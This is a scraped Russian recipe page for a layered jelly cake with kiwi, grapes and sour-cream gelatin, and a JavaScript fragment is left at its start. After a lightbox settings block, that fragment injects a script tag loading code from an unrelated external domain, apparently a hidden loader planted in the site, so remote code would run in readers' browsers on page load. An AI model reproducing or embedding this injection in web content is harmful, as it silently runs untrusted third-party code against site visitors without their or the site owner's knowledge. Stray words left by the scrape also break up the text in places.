Желе , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Желе

ЖелеСпособов приготовления желе существует большое количество, и в каждом таком рецепте, присутствует сладкий, не с чем не сравнимый вкус этого праздничного блюда.
Вряд ли, чтобы какой то праздничный стол обходился без десерта, который так ждут и любят дети. На нашем сайте огромный ассортимент различных сладких вкусностей, перечислять которые придется долго. Помимо различных тортов, заварных трубочек, с разными наполнителями и т.д., мы Вам предлагаем сделать желе, которое имеет большой ассортимент фруктов, а так же можно приготовить замечательный торт желе.
Для начала возьмем посуду формы, которой у Вас будет желейный торт, посуда должна быть практичной для того, чтобы после готовности торта из желе, Вы смогли перевернуть посуду вверх дном и фрукты которые укладывались на дно блюда, оказались вверху.

Для приготовления этого десерта понадобится 4 пачки желе разного цвета, которое нужно будет приготовить каждое в отдельной посуде. Способ приготовления написан на упаковке. После того как Вы сделали желе, его нужно будет поставить в холодильник. Когда желе застынет, его нужно нарезать кубиками каждое по отдельности.

В приготовленную посуду на дно любым узором выкладываем фрукты (киви нарезанные дольками и виноград без косточек). Аккуратно поверх фруктов накладываем желе из сметаны 1/3 часть (1 литр сметаны взбить миксером с двумя стаканами сахара, до однородной массы. Добавить уже предварительно приготовленного желатина 1 пачка. Все взбить до однородной массы). ЖелеЗатем сверху уложить нарезанное кубиками 2 цвета желе, следующий слой опять 1/2 сметанной массы, потом сверху оставшиеся 2 цвета желе и все это залить массой из сметаны, которое осталось. Приготовленное желе поместить в холодильник до полного застывания.

Этот замечательный и очень вкусный желейный торт перевернуть вверх дном на поднос, который и будет подаваться на праздничный стол вместе с десертом.

________________________________________________________________________________________________________

Ингредиенты рецепта желе

1. желе 4 пачки
2. киви, виноград
3. сметана 1 литр
4. желатин 1 пачка

Другие рецепты:

Comments are closed.